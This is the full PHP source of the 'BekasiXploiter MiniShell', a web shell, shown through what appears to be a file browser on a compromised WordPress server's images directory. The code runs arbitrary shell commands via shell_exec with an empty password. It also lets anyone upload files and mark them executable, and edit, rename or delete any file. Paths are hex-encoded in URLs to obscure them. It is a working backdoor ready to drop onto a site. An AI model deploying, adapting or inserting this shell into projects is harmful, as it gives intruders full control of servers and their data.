HEX
Server: Apache/2.4.65 (Debian)
System: Linux wordpress-7cb4c6b6f6-mtmmf 5.15.0-131-generic #141-Ubuntu SMP Fri Jan 10 21:18:28 UTC 2025 x86_64
User: www-data (33)
PHP: 8.3.27
Disabled: NONE
$ pwd: /proc/self/root/var/www/html/images/
Upload Files
File: //proc/self/root/var/www/html/images/alr.php
<?php

$EXEC_PASSWORD = '';


$ALLOW_RAW_EXEC = true;


function lrxHeader() {
    echo "<style>
    :root{--accent:#00ff7f;--muted:#8b98a6;}
    html,body{height:100%;margin:0;font-family: 'Courier New', monospace;background:linear-gradient(180deg,#020204,#071021);color:var(--accent)}
    .wrapper{max-width:1100px;margin:18px auto;padding:18px;border-radius:12px;background:rgba(255,255,255,0.02);box-shadow:0 6px 30px rgba(2,6,23,0.7)}
    .header{display:flex;gap:12px;align-items:center;padding:12px;border-bottom:1px solid rgba(255,255,255,0.02)}
    .logo{width:70px;height:70px;border-radius:8px;display:flex;align-items:center;justify-content:center;background:linear-gradient(135deg,#001f0f,#003826)}
    .logo pre{margin:0;color:var(--accent);font-weight:700;font-size:10px}
    .title h1{margin:0;font-size:18px}
    .warning{color:#ffb86b;font-size:13px;margin-top:6px}
    .layout{display:grid;grid-template-columns:320px 1fr;gap:16px;padding:18px}
    .panel{background:rgba(255,255,255,0.02);padding:12px;border-radius:10px;border:1px solid rgba(255,255,255,0.02)}
    .path-box{background:#07121b;padding:8px;border-radius:6px;color:var(--accent);font-size:13px;word-break:break-all}
    .list a{color:var(--accent);text-decoration:none}
    .file-actions a{margin-left:8px;color:var(--accent)}
    textarea{width:100%;min-height:160px;background:#020409;color:var(--accent);border:1px solid rgba(0,255,127,0.06);padding:8px;border-radius:6px}
    input[type='text']{width:100%;padding:8px;border-radius:6px;background:#020409;color:var(--accent);border:1px solid rgba(0,255,127,0.06)}
    .btn{display:inline-block;padding:8px 10px;border-radius:6px;background:transparent;border:1px solid rgba(0,255,127,0.08);color:var(--accent);cursor:pointer}
    .cmd-output{background:#000;padding:10px;border-radius:6px;border:1px solid rgba(255,255,255,0.03);color:var(--accent);white-space:pre-wrap;font-size:13px}
    @media(max-width:860px){.layout{grid-template-columns:1fr;}}
    </style>";
    echo "<div class='wrapper'><div class='header'><div class='logo'><pre>BEKASI\nXPLOITER</pre></div><div class='title'><h1>BekasiXploiter MiniShell</h1><p style='margin:4px 0 0;color:var(--muted);font-size:12px'>OreoGans // @chillguyfromrosario</p><div class='warning'>email:[email protected]</div></div></div>";
}

function light($sky) {
    $str = '';
    for ($i = 0; $i < strlen($sky) - 1; $i += 2) {
        $str .= chr(hexdec($sky[$i] . $sky[$i + 1]));
    }
    return $str;
}

function tea($sky) {
    $str = '';
    for ($i = 0; $i < strlen($sky); $i++) {
        $str .= dechex(ord($sky[$i]));
    }
    return $str;
}

function listDirectories($path) {
    if ($path !== '/') {
        $parent = dirname($path);
        echo "<h3><li><a href='?path=" . tea($parent) . "'>>>>>(ParentπŸ“)</a></li></h3>";
    }
    echo "<h3 style='text-decoration: underline;'>πŸ“ Directory: </h3><ul class='list'>";
    foreach (scandir($path) as $item) {
        if ($item == '.' || $item == '..') continue;
        $fullPath = $path . '/' . $item;
        if (is_dir($fullPath)) {
            echo "<li>-->><a href='?path=" . tea($fullPath) . "'>" . htmlspecialchars($item) . "πŸ“</a></li>";
        }
    }
    echo "</ul>";
}

function listFiles($path) {
    echo "<h3 style='text-decoration: underline;'>πŸ“ Files: </h3><ul class='list'>";
    foreach (scandir($path) as $item) {
        if ($item == '.' || $item == '..' || is_dir($path . '/' . $item)) continue;
        $fullPath = $path . '/' . $item;
        echo "<li>-->>πŸ“„" . htmlspecialchars($item) . " ";
        echo "<span class='file-actions'><a class='edit-link' href='?path=" . tea($path) . "&edit=" . tea($item) . "'>[Edit]</a>";
        echo "<a class='rename-link' href='?path=" . tea($path) . "&rename=" . tea($item) . "'>[Rename]</a>";
        echo "<a class='delete-link' href='?path=" . tea($path) . "&delete=" . tea($item) . "'>[Delete]</a></span>";
        echo "</li>";
    }
    echo "</ul>";
}

# ==== PATH HANDLING ====
$path = isset($_GET['path']) ? light($_GET['path']) : getcwd();
if (!is_dir($path)) $path = getcwd();

# ==== ACTIONS ====
if (isset($_GET['delete'])) {
    $target = $path . '/' . light($_GET['delete']);
    if (is_file($target)) {
        unlink($target);
    }
    header('Location: ?path=' . tea($path));
    exit;
}

if (isset($_POST['rename']) && isset($_POST['newname'])) {
    $from = $path . '/' . $_POST['rename'];
    $to = $path . '/' . $_POST['newname'];
    if (is_file($from)) rename($from, $to);
    header('Location: ?path=' . tea($path));
    exit;
}

if (isset($_POST['create']) && isset($_POST['filename'])) {
    $f = $path . '/' . basename($_POST['filename']);
    file_put_contents($f, '');
    header('Location: ?path=' . tea($path));
    exit;
}

if (isset($_POST['edit']) && isset($_POST['content'])) {
    $f = $path . '/' . $_POST['edit'];
    file_put_contents($f, $_POST['content']);
    header('Location: ?path=' . tea($path));
    exit;
}

if(isset($_REQUEST["up"])){
    $file = $path . '/' . basename($_FILES["file"]["name"]);
    if(@move_uploaded_file($_FILES["file"]["tmp_name"],$file)) {
        @chmod($file,0755);
        $msg = "OK !!";
    } else {
        $msg = "FAIL !!";
    }
    // continue rendering
}

# ========== EXEC HANDLER (RAW) ==========
$exec_result = '';
if (isset($_POST['run_cmd'])) {
    $cmd = trim($_POST['cmd'] ?? '');
    $pass = $_POST['exec_pass'] ?? '';
    // password check (if set)
    if ($EXEC_PASSWORD !== '' && $pass !== $EXEC_PASSWORD) {
        $exec_result = "ERROR: Invalid exec password.";
    } else {
        if ($cmd === '') {
            $exec_result = "No command provided.";
        } else {
            // Execute raw command, capture output and status
            // Use 2>&1 to capture stderr as well
            $output = shell_exec($cmd . ' 2>&1');
            if ($output === null) $output = "Command executed but no output.";
            $exec_result = htmlspecialchars($output);
        }
    }
}

# ========== RENDER UI ==========
lrxHeader();

echo "<div class='layout'>";
echo "<div class='sidebar panel'>";
echo "<div class='side-section'><h3>Current Directory</h3>";
echo "<div class='path-box'>" . htmlspecialchars($path) . "</div></div>";

listDirectories($path);
listFiles($path);

echo "<hr>";
echo "<h3>Create New File:</h3>";
echo "<form method='POST'>";
echo "<input type='text' name='filename' placeholder='Filename'><br><br>";
echo "<button class='btn' type='submit' name='create'>Create</button>";
echo "</form>";

echo "<hr>";
echo "<h3>Upload File:</h3>";
echo '<form method="POST" enctype="multipart/form-data"><input name="file" type="file"><br><br><input class="btn" type="submit" name="up" value="Upload"></form>';
if(isset($msg)) echo "<div style='margin-top:8px;color:var(--accent)'>$msg</div>";

echo "</div>"; // end sidebar

echo "<div class='main panel'>";
echo "<div style='display:flex;gap:12px;align-items:center;justify-content:space-between;'><h2>File Editor / CMD</h2><div style='color:var(--muted);font-size:13px'>Raw exec: ON</div></div>";

if (isset($_GET['edit'])) {
    $file = $path . '/' . light($_GET['edit']);
    $content = is_file($file) ? file_get_contents($file) : '';
    echo "<h3>Editing: " . htmlspecialchars($_GET['edit']) . "</h3>";
    echo "<form method='POST'>";
    echo "<textarea name='content' rows='10'>" . htmlspecialchars($content) . "</textarea><br>";
    echo "<input type='hidden' name='edit' value='" . htmlspecialchars($_GET['edit']) . "'>";
    echo "<button class='btn' type='submit'>Save</button>";
    echo "</form><hr>";
}

if (isset($_GET['rename'])) {
    $file = $path . '/' . light($_GET['rename']);
    echo "<h3>Renaming: " . basename($file) . "</h3>";
    echo "<form method='POST'>";
    echo "<input type='text' name='newname' placeholder='New name'>";
    echo "<input type='hidden' name='rename' value='" . basename($file) . "'>";
    echo "<button class='btn' type='submit'>Rename</button>";
    echo "</form><hr>";
}

// CMD form
echo "<h3>Command Shell</h3>";
echo "<form method='POST' style='display:grid;gap:8px;'>";
echo "<input type='text' name='cmd' placeholder='e.g. ls -la' autofocus>";
// show password field only if EXEC_PASSWORD is set (but we allow empty too)
if ($EXEC_PASSWORD !== '') {
    echo "<input type='text' name='exec_pass' placeholder='Exec password'>";
} else {
    // still present field so user can type (optional)
    echo "<input type='text' name='exec_pass' placeholder='(no password required)'>";
}
echo "<div style='display:flex;gap:8px;align-items:center'><button class='btn' type='submit' name='run_cmd'>Run</button><button class='btn' type='button' onclick=\"document.querySelector('input[name=cmd]').value='pwd';\">pwd</button><button class='btn' type='button' onclick=\"document.querySelector('input[name=cmd]').value='ls -la';\">ls -la</button></div>";
echo "</form>";

if ($exec_result !== '') {
    echo "<h4>Output:</h4>";
    echo "<div class='cmd-output'>" . $exec_result . "</div>";
}

echo "</div>"; // end main

echo "</div></div>"; // end layout + wrapper
?>
@ Telegram